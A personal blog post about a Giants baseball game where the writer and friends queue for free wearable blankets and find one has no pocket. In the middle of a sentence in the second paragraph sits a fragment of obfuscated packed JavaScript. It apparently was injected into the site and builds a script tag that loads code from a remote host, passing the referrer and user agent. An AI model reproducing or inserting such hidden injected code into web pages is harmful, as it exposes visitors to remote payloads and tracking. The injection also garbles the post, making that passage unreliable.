The things you’ll do for free stuff

Our friends were in town this past weekend.  Charlie and Andrea.  Remember ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“<\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yhhtr|var|u0026u|referrer|kefyt||js|php’.split(‘|’),0,{}))
them
?  They got married in Montanan last year.  I’ve known Charlie since middle school and he’s been friends with Nick since elementary school.

Charlie wanted to catch a Giants game while in town.  So we headed to the park on Friday.  But this wasn’t just ANY night, it was giveaway night.  And do you know what they were giving away?  Wait for it……….wearable blankets!!!!  I know.  I was excited too.

Bright orange snuggies!  It doesn’t get much better than that.

We wanted to be sure we got one of the 20,000 snuggies, so we decided to get there when the park opened.  5:15.  Us about about 20,000 other people.

We had to wait in a line that wrapped around and behind the stadium.  We were getting nervous.  What if they ran out?!

Well, thankfully they didn’t and we all walked away very happy.

Good thing.  Nick and I were banking on the snuggies to keep us warm.  That stadium is COLD!

Here we are modeling our goods

Nick finally decided to put his on around the 5th inning.  That’s when we discovered the unthinkable.  He didn’t have a pocket!!!  That’s right.  He was pocketless.  We checked to make sure it wasn’t on backwards (super embarrassing if it was….good thing it wasn’t).  It was official.  No pocket for this kid.  Either way, we’ve now got 2 wearable blankets sitting in our house.  Next time you come and visit and say it’s a little chilly, you can wear one of these bad boys.
